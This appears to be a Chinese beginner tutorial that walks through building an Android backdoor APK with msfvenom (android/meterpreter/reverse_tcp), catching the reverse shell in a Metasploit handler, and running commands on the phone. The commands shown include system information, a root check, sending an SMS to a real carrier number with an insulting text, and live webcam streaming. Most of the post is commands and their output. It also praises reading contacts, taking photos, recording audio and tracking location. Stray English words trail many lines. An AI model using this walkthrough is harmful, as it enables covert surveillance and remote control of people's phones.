掃盲教程,大佬勿噴。html
實驗中請更改成你環境的IP。java
生成apk後門
Kali Linux(Hack):192.168.169.76android
Android(靶機):192.168.169.137web
啓動kali,開終端,生成apk後門。僅有9.2k的apk,也是蠻吊瀏覽器
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload No encoder or badchars specified, outputting raw payload Payload size: 9486 bytes
lhost爲kali的ip,lport指定一個端口。bash
開metasploit控制檯偵聽
root@kali:~# msfconsole msf > use exploit/multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp #設置payload payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 192.168.169.76 #kali的IP lhost => 192.168.169.76 msf exploit(handler) > set lport 445 #對應剛纔設的端口 lport => 445 msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.169.76:445 [*] Starting the payload handler... [*] Sending stage (63194 bytes) to 192.168.169.137 [*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400
複製apk出來裝到手機上打開後就能夠exploit了,會看到會話反彈回來。微信
能夠看下幫助都有啥操做session
meterpreter > helpapp
功能示例
讀取聯繫人,信息,拍照,錄音,獲取位置信息,上傳下載文件等等,仍是挺強大的。tcp
#系統信息
meterpreter > sysinfo
Computer : localhost
OS : Android 7.1.2 - Linux 3.18.31-gc725c42 (aarch64)
Meterpreter : java/android
#查看root狀態
meterpreter > check_root
[+] Device is rooted
#發送短信
meterpreter > send_sms
[-] You must enter both a destination address -d and the SMS text body -t
[-] e.g. send_sms -d +351961234567 -t "GREETINGS PROFESSOR FALKEN."
OPTIONS:
-d <opt> Destination number
-dr Wait for delivery report
-h Help Banner
-t <opt> SMS body text
meterpreter > send_sms -d +8610086 -t "我是你爸爸"
[+] SMS sent - Transmission successful
meterpreter >
#網頁視頻聊天(我手機沒合適瀏覽器沒打開) meterpreter > webcam_chat [*] Webcam chat session initialized. [-] Error running command webcam_chat: RuntimeError Unable to find a suitable browser on the target machine #網頁攝像頭視頻流,顯示實時畫面 meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: lwqAtUFm.html [*] Streaming...
補充freebuf上的文章: